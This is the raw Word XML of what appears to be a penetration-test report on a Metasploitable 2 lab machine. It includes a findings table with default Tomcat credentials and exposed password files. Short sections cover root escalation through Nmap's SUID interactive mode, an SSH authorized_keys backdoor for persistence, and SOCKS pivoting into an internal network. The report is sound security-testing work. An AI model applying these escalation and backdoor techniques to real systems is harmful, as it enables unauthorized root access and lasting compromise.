          <w:trHeight w:val="735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Tomcat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Credentials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spacing w:line="240" w:lineRule="auto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Default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creds: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tomcat:tomcat,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role1:tomcat, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>both:tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="1399"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.htpasswd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Files </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto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spacing w:line="240" w:lineRule="auto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TWiki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credential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hashes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found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in</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="240" w:lineRule="auto" w:before="1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/var/www/twiki/data/.htpasswd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others</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="1613" w:left="720" w:right="360"/>
        </w:sect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7"/>
        <w:gridCol w:w="2617"/>
        <w:gridCol w:w="3983"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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Readable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User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Mail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Can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read </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/var/mail/msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="735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Writable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Process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Binary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spacing w:line="242" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="994"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Writable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/usr/bin/which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(can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hijack </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>commands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="740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Can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Sniff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Traffic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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="243"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>tcpdump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available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capturing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network </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755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VNC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Password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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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/root/.vnc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="2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exists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755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Firefox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Saved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Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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spacing w:line="240" w:lineRule="auto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signons.sqlite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contains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saved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(encrypted) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="760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.rhosts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Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="108" w:right="377"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/home/msfadmin/.rhosts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/root/.rhosts </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>exist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755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Samba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Writable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Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="254" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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Guest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OK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+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writable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shares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smb.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755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Vsftpd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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Anonymous</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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Uploads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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Anonymous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login,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upload,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mkdir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all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enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="755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PostgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w: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pg_hba.conf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allows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md5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auth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from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any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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="760" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:right="852"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Root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Can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Log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via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="261" w:lineRule="auto"/>
              <w:ind w:left="109" w:right="1817"/>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low–</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium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PermitRootLogin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yes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sshd_config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="490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Services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Only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on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Localhost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Low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Possible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port-forwarding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exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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Distcc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Running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Low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Port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3632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open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(distccd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="495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Port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1524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(ingreslock)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Low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Potential</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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backdoor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:spacing w:val="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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="489" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2757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IRC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Service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Running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2617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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3983" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableParagraph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UnrealIRCd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on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ports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6667,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6697</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="337"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Binary):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto" w:before="307"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Nmap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have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SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bit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run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root.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mode allows shell escape to get a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="273" w:lineRule="auto"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="14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87834" cy="1978247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834" cy="19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00"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:bookmarkStart w:name="Persistence" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="139"/>
        <w:ind w:left="715" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="Linux — SSH Key Backdoor:" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> Backdoor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="101"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>added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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ensures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>persistent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>even after password changes.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1272539</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>151314</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4834859" cy="2973705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859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720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="129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20229" cy="2310383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0229" cy="231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203834</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5920524" cy="3429476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524" cy="342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384" w:lineRule="auto" w:before="237"/>
        <w:ind w:right="2954"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pivoting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/>
        <w:t>Lateral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Movement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AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Environment Internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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Discovery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Compromised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Host:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>establishing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foothold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Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>internal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/>
        <w:t>discovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was performed using only native tools (Living off the Land).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="10114" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="104"/>
        <w:ind w:left="715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FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> neigh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1460" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440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5429250" cy="1085850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pStyle w:val="Heading1"/>
        <w:spacing w:before="145"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Pivoting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SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Forwarding:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="222"/>
        <w:ind w:left="720" w:right="1500" w:firstLine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580383</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="271589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943600" cy="2715895"/>
                          <a:chExt cx="5943600" cy="2715895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6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359"/>
                            <a:ext cx="5942330" cy="2510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5.699451pt;width:468pt;height:213.85pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15723008;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshapegroup50" coordorigin="1440,914" coordsize="9360,4277">
                <v:shape style="position:absolute;left:1440;top:913;width:9360;height:278" type="#_x0000_t75" id="docshape51" stroked="false">
                  <v:imagedata r:id="rId26" o:title=""/>
                </v:shape>
                <v:shape style="position:absolute;left:1440;top:1237;width:9358;height:3953" type="#_x0000_t75" id="docshape52" stroked="false">
                  <v:imagedata r:id="rId27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3383781</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4024144" cy="180975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4144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1943100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3704709</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3867150" cy="2609850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SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>forwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>established</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SOCKS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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compromised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Linux host, enabling routing of all traffic to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:r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440" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>GeFng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
